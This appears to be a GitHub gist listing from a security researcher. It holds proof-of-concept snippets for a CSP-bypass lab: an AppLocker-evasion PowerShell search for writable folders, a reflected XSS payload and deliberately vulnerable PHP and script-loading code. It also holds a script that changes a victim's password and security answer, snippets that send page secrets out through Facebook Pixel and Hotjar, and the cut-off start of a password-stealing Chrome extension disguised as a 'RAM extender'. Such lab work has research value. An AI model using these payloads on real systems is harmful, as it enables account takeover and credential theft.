Skip to content

Instantly share code, notes, and snippets.

View felmoltor's full-sized avatar
🍊
Is this real life?

Felipe Molina felmoltor

🍊
Is this real life?
View GitHub Profile
@felmoltor
felmoltor / Search-Writable.ps1
Created November 23, 2023 10:19
Search writable folders and network shares without "accesschk.exe"
# Author: Felipe Molina de la Torre
# Date: Novermber 2023
# Summary: Accessckl-like script, but without using external executable files like "accesschk.exe".
# It shows you the folders and executables where your user have write permissions and why.
# This is useful for systems where AppLocker is in place and you cannot execute arbitrary exes but you can execute PowerShell.
# Class to store permissions
class Permissions {
[string]$GroupName
[string]$SID
@felmoltor
felmoltor / secret.php
Last active August 23, 2023 20:47
secret #1 vuln
// GET /secret.php?msg=This%20is%20an%20error";alert("hello%20xss");var%20foo="var
// […]
<script defer nonce="ceT7vflNlU8YT58gnQnZH4xi">
function displayError(){
document.getElementById('error-div').innerText="Error 1005: This is an error";alert("Hello xss");var foo="var";
}
displayError();
</script>
// […]
@felmoltor
felmoltor / secret.php
Last active August 23, 2023 20:47
secret 2 vuln
// GET /secret.php?source=js/debug.js
// […]
<script defer nonce="ceT7vflNlU8YT58gnQnZH4xi">
const urlParams = new URLSearchParams(window.location.search);
const source = urlParams.get('source');
var s=document.createElement("script");
s.src=source;
document.head.appendChild(s);
</script>
@felmoltor
felmoltor / secret.php
Last active August 23, 2023 20:42
secret
<?php
if (isset($_GET["msg"])){
$errorMsg = "Error 1005: ".$_GET["msg"];
}
else{
$errorMsg="";
}
?>
'use strict';
export const handler = async (event) => {
const response = {
statusCode: 200,
headers: {
'Content-Type': 'text/html',
},
body: event.queryStringParameters.data,
};
var decoded=Buffer.from(event.queryStringParameters.data, 'base64').toString('ascii');
@felmoltor
felmoltor / PoC-CSP-Bypass-pwn.js
Created August 23, 2023 14:50
Change user password and security answer
fetch('/profile.php').then(function (response) {
return response.text();
}).then(function (html) {
// This is the HTML from our response as a text string
const parser = new DOMParser();
const pd = parser.parseFromString(html, "text/html");
sq=pd.getElementById('security_question').value;
sa=pd.getElementById('security_answer').value;
email=pd.getElementById('email').value;
username=pd.getElementById('username').value;
@felmoltor
felmoltor / Facebook-exfil-csp.js
Created August 23, 2023 14:45
Facebook CSP Exfiltration
fbq('init', '1179785999289471');
fbq('trackCustom', 'MyEvent-keyfc',{
data: "Secret ingredient is: '"+document.getElementById('secret-ingredient').innerText+"'"
});
@felmoltor
felmoltor / Hotjar-poll-answer.js
Last active August 23, 2023 14:44
PoC for the CSP bypass Lab
fetch('/profile.php').then(function (response) {
return response.text();
}).then(function (html) {
// This is the HTML from our response as a text string
const parser = new DOMParser();
const pd = parser.parseFromString(html, "text/html");
sq=(pd.getElementById('security_question')).value;
sa=(pd.getElementById('security_answer')).value;
var data = {"utk":null, "response_content":"{\"version\":4 ,\"answers\":[{\"questionUuid\":\"78942292\"
,\"answer\":\"Something else\",
console.log("Hello from a gist file hosted in felmoltor's github");
@felmoltor
felmoltor / background.js
Last active March 21, 2023 14:44
Chrome Extension to Snatch Passwords when Unhidden
// TODO: Find all the fields that might be a password field.
// for now, we can do it only for a input field with id "password"
console.log("RAM extender is looking around.");
chrome.runtime.onMessage.addListener(
function(request, sender, sendResponse) {
console.log(sender.tab ?
"from a content script:" + sender.tab.url :
"from the extension");